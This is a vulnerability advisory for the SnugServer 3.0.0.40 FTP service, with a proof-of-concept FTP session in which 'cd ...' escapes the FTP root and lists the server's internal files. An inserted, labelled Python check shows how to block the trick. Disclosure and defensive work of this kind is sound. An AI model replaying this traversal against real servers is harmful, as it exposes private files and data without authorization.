Message-ID: <52fae8f7.c5482a77.82f0800@saruman.inter.net.il>
From: muts at zahav.net.il (muts@...av.net.il)
Subject: Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service

See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks.
Product Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A directory traversal vulnerability has been discovered in the
SnugServer 3.0.0.40 FTP service. An FTP client can reach the
server filesystem outside of the FTP root (ftproot); in the
PoC below, a "cd ..." request leaves the root and lists the
server's own directories and data files.

[-] PoC

root@...ppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready. 
 Name (192.168.1.154:root): muts@...ault.com
331  Password required for muts@...ault.com.
Password:
230  See FTP Server 
Remote system type is You.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
 drw-rw-rw-   1 owner    group            0  Jan 21 03:51 ..
 drw-rw-rw-   1 owner    group            0  Jan 21 02:08 dir
226  Transfer Complete.
ftp> cd ...
200  PORT Command Successful.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ..
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Cert
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Logs
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Requests
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Scripts
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Errors
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Queue
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 www
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Infected
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Temp
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Filtered
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 BaseData
-rw-rw-rw-   1 owner    group 8421376  Jan 21 03:52 SNUG.FDB
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ftp
-rw-rw-rw-   1 owner    group 1861120  Jan 21 03:52 Snug.gbk
-rw-rw-rw-   1 owner    group   32  Jan 21 03:52 yarrow.rnd
226  Transfer Complete.
ftp>
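As an added illustration (not SnugServer's code, and not part of the original advisory), the path-containment check an FTP server needs so that a request like the PoC's "cd ..." cannot leave the FTP root. FTPROOT is a constructed example path; the check works whether or not it exists on the host.

```python
import os
import posixpath

# Constructed example root; the check works whether or not it exists.
FTPROOT = "/srv/ftproot"
REAL_ROOT = os.path.realpath(FTPROOT)


def resolve_within_root(ftproot, cwd, client_path):
    """Map a client-supplied FTP path onto the host filesystem.

    ftproot     - host directory that must contain every resolved path
    cwd         - client's current virtual directory (POSIX style, e.g. "/dir")
    client_path - argument of CWD/RETR/LIST exactly as the client sent it
    Raises ValueError when the path must not be served.
    """
    posix = client_path.replace("\\", "/")  # treat either separator alike
    for part in posix.split("/"):
        if part in ("", ".", ".."):
            continue  # a plain ".." is clamped by normpath below
        # Win32 strips trailing dots and spaces from a name, so "..." can be
        # opened as ".." (the trick in the PoC) and "x." as "x". Refuse both.
        if part[-1] in ". ":
            raise ValueError("ambiguous trailing dot/space in %r" % part)
    # Normalizing an absolute POSIX path never climbs above "/", so any
    # surviving ".." stops at the virtual root instead of escaping it.
    virtual = posixpath.normpath(posixpath.join(cwd, posix))
    root = os.path.realpath(ftproot)
    host = os.path.realpath(os.path.join(root, virtual.lstrip("/")))
    # After symlink resolution the result must still be the root itself
    # or a path below it; a bare prefix test would accept "/srv/ftproot2".
    if host != root and not host.startswith(root + os.sep):
        raise ValueError("resolved outside ftproot: %r" % client_path)
    return host


def is_allowed(ftproot, cwd, client_path):
    """True if the path would be served, False if the check rejects it."""
    try:
        resolve_within_root(ftproot, cwd, client_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Replay the advisory's session against the check: "cd ..." is refused,
    # while a plain ".." merely stays inside the root.
    for p in ["dir", "..", "...", "../../Logs", "dir\\...\\Cert"]:
        print("%-16s %s" % (p, "allowed" if is_allowed(FTPROOT, "/", p) else "REJECTED"))
```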
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
